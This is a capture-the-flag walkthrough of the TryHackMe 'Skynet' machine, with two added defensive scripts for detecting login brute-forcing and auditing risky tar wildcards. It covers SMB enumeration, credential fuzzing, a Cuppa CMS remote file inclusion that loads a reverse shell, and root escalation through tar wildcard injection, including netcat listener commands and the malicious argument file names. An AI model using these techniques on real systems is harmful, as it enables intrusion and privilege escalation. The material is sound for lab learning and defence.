Got an IP from TryHackMe and stored it in a Linux environment variable with the export command, so the later commands can refer to it as $ip.
export ip=10.10.108.117
Scanning
Starting off with a simple nmap scan to find the open ports and the services running on them, using the following command.
$ nmap -sCV --min-rate 100 --max-rate 200 $ip
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http
|_http-title: Skynet
110/tcp open pop3
|_pop3-capabilities: RESP-CODES CAPA TOP PIPELINING AUTH-RESP-CODE SASL UIDL
139/tcp open netbios-ssn
143/tcp open imap
|_imap-capabilities: Pre-login LOGINDISABLEDA0001 IDLE LITERAL+ SASL-IR more have post-login listed ENABLE capabilities IMAP4rev1 OK ID LOGIN-REFERRALS
445/tcp open microsoft-ds
Host script results:
|_clock-skew: mean: 1h37m20s, deviation: 2h53m12s, median: -2m40s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-08-16T07:27:24-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-08-16T12:27:24
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
The nmap scan results show the following open ports on the system:
22 for SSH
80 for HTTP
110 for pop3
139 for netbios
143 for IMAP
445 for SMB, shown as microsoft-ds in the scan result.
Enumeration
Start the enumeration with the SMB server to see how many shares it has and whether any of them can be accessed without credentials. The SMB service often gives away a lot of information, such as users, the domain name and the computer name.
SMB
Listing The Shares
$ smbclient -L ////$ip//
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
From the share listing above we can see two shares that are not there by default, anonymous and milesdyson. We can try to access them without supplying a password.
smbclient //$ip/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 21:04:00 2020
.. D 0 Tue Sep 17 12:20:17 2019
attention.txt N 163 Wed Sep 18 08:04:59 2019
logs D 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5818464 blocks available
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 09:42:16 2019
.. D 0 Thu Nov 26 21:04:00 2020
log2.txt N 0 Wed Sep 18 09:42:13 2019
log1.txt N 471 Wed Sep 18 09:41:59 2019
log3.txt N 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5818460 blocks available
The anonymous share could be accessed and contained some files. On checking them, log1.txt looks like some kind of password list, and attention.txt carries some information too, but it also mentions the name Miles Dyson, and there is a share named after him as well.
HTTP
Now we start enumerating the HTTP server. On a web server we are usually interested in login pages, hidden files and directories, any information about the CMS and its version, if there is one, and the backend technologies and their versions. Once we know those, we look for vulnerabilities in them.
Running ffuf for content discovery found some pages belonging to SquirrelMail, which has a login form. I fuzzed that login with ffuf, using milesdyson as the username and log1.txt as the password list, to look for a valid credential. The options used were the following.
-w specifies the wordlist, in this case the log1.txt file.
:FUZZ is the keyword marking the fuzzing position, where : is a separator and FUZZ is the actual keyword. It can be omitted for a single list, but with multiple lists each one must be given a different keyword.
-u specifies the URL.
-X specifies the request method.
-d specifies the request body data.
-H specifies a request header, in this case Content-Type: application/x-www-form-urlencoded, which has to be supplied because we are sending a POST request with form parameters.
-fs filters results by response size. Most responses had the same size, namely the ones for wrong credentials, so filtering on that size leaves only the few responses that indicate a valid login.
Using the above command we got a valid login credential.
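The fuzzing described above, seen from the defender's side: a short shell script, added here and not part of the original writeup, that runs over a few constructed Apache access-log lines and flags a source IP that hammers the webmail login endpoint. Password guessing leaves exactly the trace the -fs filter relies on, many POSTs with the same response size, so the script reports both the request count and the number of distinct response sizes per IP. The login path, IPs, user agent and log lines are assumptions made for this demo.

```shell
#!/bin/sh
# Added example, not part of the original writeup: detect a login-guessing
# burst in web server access logs. All log lines, addresses and the login
# path below are constructed for this demo.

LOG=$(mktemp)
trap 'rm -f "$LOG"' EXIT
LOGIN_PATH="/squirrelmail/src/redirect.php"   # assumed SquirrelMail login handler

# Constructed combined-format log: one normal user (10.0.0.9) and one source
# (10.0.0.5) sending repeated POSTs that all come back with the same size,
# followed by one differently sized response (the successful login).
cat > "$LOG" <<'EOF'
10.0.0.9 - - [16/Aug/2022:07:29:40 -0500] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Aug/2022:07:29:52 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Aug/2022:07:30:01 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1542 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:01 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1542 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:01 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1542 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:02 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1542 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:02 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1542 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:02 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1542 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:03 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1542 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:03 -0500] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Fuzz Faster U Fool v1.5"
10.0.0.5 - - [16/Aug/2022:07:30:04 -0500] "GET /squirrelmail/src/webmail.php HTTP/1.1" 200 3180 "-" "Fuzz Faster U Fool v1.5"
EOF

# login_bursts LOG THRESHOLD: for every source IP that POSTed to LOGIN_PATH
# at least THRESHOLD times, print "ip total distinct_response_sizes".
# In combined log format $1 is the client IP, $6 is the quoted method,
# $7 the path and $10 the response size. A high total paired with very few
# distinct sizes is the signature of guessing: each failure returns the
# same page, only a success looks different.
login_bursts() {
    awk -v path="$LOGIN_PATH" -v thr="$2" '
        $6 == "\"POST" && $7 == path {
            total[$1]++
            if (!(($1, $10) in seen)) { seen[$1, $10] = 1; sizes[$1]++ }
        }
        END { for (ip in total) if (total[ip] >= thr) print ip, total[ip], sizes[ip] }
    ' "$1"
}

# Five login POSTs from one address within the log is our alert threshold.
login_bursts "$LOG" 5
```

On the constructed log this prints `10.0.0.5 8 2`: eight POSTs to the login handler, seven of them identical in size, which is the pattern to alert on and to rate-limit at the login endpoint.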
Valid Credentials
milesdyson:cyborg007haloterminator
Using the above credentials we can log in to SquirrelMail, a webmail application for sending and receiving email. The user milesdyson has some emails there that we can read, and one of them says the following.
Samba Password reset
We have changed your smb password after the system malfunction.
Password: )s{A&2Z=F^n_E.B`
Another password was found.
Other emails and their content:
From: serenakogan@skynet
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
---
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
Nothing special there.
SMB - Miles
We now have Miles's SMB password, so we can log in with it.
$ smbclient //$ip/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 14:05:47 2019
.. D 0 Wed Sep 18 08:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:05:14 2019
notes D 0 Tue Sep 17 14:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:05:14 2019
9204224 blocks of size 1024. 5818448 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 14:18:40 2019
.. D 0 Tue Sep 17 14:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:01:29 2019
important.txt N 117 Tue Sep 17 14:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:01:29 2019
9204224 blocks of size 1024. 5818448 blocks available
Above we see the milesdyson user has a lot of files in their share, but one file catches the eye: important.txt. It has some useful content.
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
This is a to-do list mentioning some things about his life and work, but we are only interested in /45kra24zxs28v3yd, which looks very much like an HTTP directory, and visiting it confirms that it is a valid web directory. There is nothing obviously exploitable in it, so I started an ffuf scan to do some content discovery.
The administrator page identifies it as Cuppa CMS, and searchsploit cuppa cms turns up a potential RFI (Remote File Inclusion) vulnerability. Knowing that, I downloaded the PHP reverse shell by pentest monkey, changed the IP address and port number in it, and hosted the file with a Python HTTP server. I then exploited the RFI vulnerability so that the vulnerable page requests our shell.php file and executes it, which gives us a reverse shell.
Note: open your listener with nc -lvnp 4444 before running the exploit command.
After gaining access as the low-privileged www-data user, I started enumerating the system, looking for SUID binaries, sudo permissions and so on. Nothing special turned up until I used the following command to see the content of the crontab file.
cat /etc/crontab
It shows a cron job run by the root user: /home/milesdyson/backups/backup.sh every minute. I checked whether I could read backup.sh, and I could; it has the following content.
www-data@skynet:/home/milesdyson/backups$ ll
total 1640
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 4413440 Aug 16 09:58 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
It backs up everything in /var/www/html into backup.tgz. One thing to note is the wildcard *, which expands to everything in the directory, files and directories alike. That is risky because of a technique called wildcard injection: we can create files whose names look like command-line arguments, much as -al is an argument to the ls command. For the tar binary there is a documented way of using this to execute a command, as follows.
First create a file shell.sh in /var/www/html containing a reverse shell command. Then create files whose names look like arguments to the tar command, so that tar eventually executes shell.sh.
Recap: we create files in the /var/www/html directory named --checkpoint-action=exec=sh shell.sh and /var/www/html/--checkpoint=1, plus shell.sh, which holds our reverse shell command.
So when the cron job runs tar, the shell expands the wildcard and tar takes those file names as arguments, which executes our shell command. --checkpoint-action=exec= is a legitimate argument of the tar command that runs a system command at checkpoints while tar processes the files. Following the above method I received a reverse shell back as the root user.
Note: you have to start your listener with nc -lvnp 5555 to catch the reverse shell.
Now that you are root, copy the flags and submit them to TryHackMe to finish the machine.
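The root cause above is the unquoted glob in a script that root runs from cron. As an added example that is not part of the original writeup, the following shell script writes the weak backup.sh next to a hardened version, audits a directory of scripts for the "tar ... *" pattern, and runs the hardened invocation against a constructed site tree. Everything lives under a temp directory; the paths in the two sample scripts mirror the ones on the box but are only text being audited, and the audit rule itself (bare "*" argument to tar with no "--" separator) is this example's own heuristic.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit cron-run scripts for
# the risky "tar ... *" pattern and show the hardened form of backup.sh.
# The sample scripts and the site tree are constructed under a temp dir.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Weak form, as found on the box: the shell expands * inside the web root,
# so any file name there that starts with "-" is handed to tar as an option.
cat > "$WORK/weak_backup.sh" <<'EOF'
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
EOF

# Hardened form: no glob at all. -C enters the directory and "." names its
# contents, so nothing found inside it can ever be parsed as an option.
cat > "$WORK/hardened_backup.sh" <<'EOF'
#!/bin/bash
set -eu
tar cf /home/milesdyson/backups/backup.tgz -C /var/www/html .
EOF

# tar_glob_risk FILE: exit 0 (risky) when FILE runs tar with a bare "*"
# argument and no "--" end-of-options marker on that line, exit 1 otherwise.
tar_glob_risk() {
    grep -E '(^|[;&|[:space:]])tar[[:space:]]' "$1" \
      | grep -E '(^|[[:space:]])\*([[:space:]]|$)' \
      | grep -qvE '(^|[[:space:]])--([[:space:]]|$)'
}

# audit_dir DIR: print every *.sh under DIR that tar_glob_risk flags.
audit_dir() {
    for f in "$1"/*.sh; do
        [ -f "$f" ] || continue
        if tar_glob_risk "$f"; then echo "RISK: $f"; fi
    done
}

# hardened_backup SRC DEST: the safe invocation as a reusable function for a
# cron script; archives the contents of SRC without any shell glob.
hardened_backup() {
    tar cf "$2" -C "$1" .
}

audit_dir "$WORK"                        # prints RISK: .../weak_backup.sh

# Run the hardened backup against a constructed site tree and list the archive.
mkdir -p "$WORK/site/css"
echo "<h1>Skynet</h1>" > "$WORK/site/index.html"
echo "body { color: #000; }" > "$WORK/site/css/main.css"
hardened_backup "$WORK/site" "$WORK/backup.tgz"
tar tf "$WORK/backup.tgz"
```

The audit is deliberately narrow: it looks only for the precondition of the technique the writeup uses, a tar argument list that the shell fills in from a glob over a directory that lower-privileged users can write to. Fixing the script is the real mitigation; the audit just tells you which cron jobs to look at first.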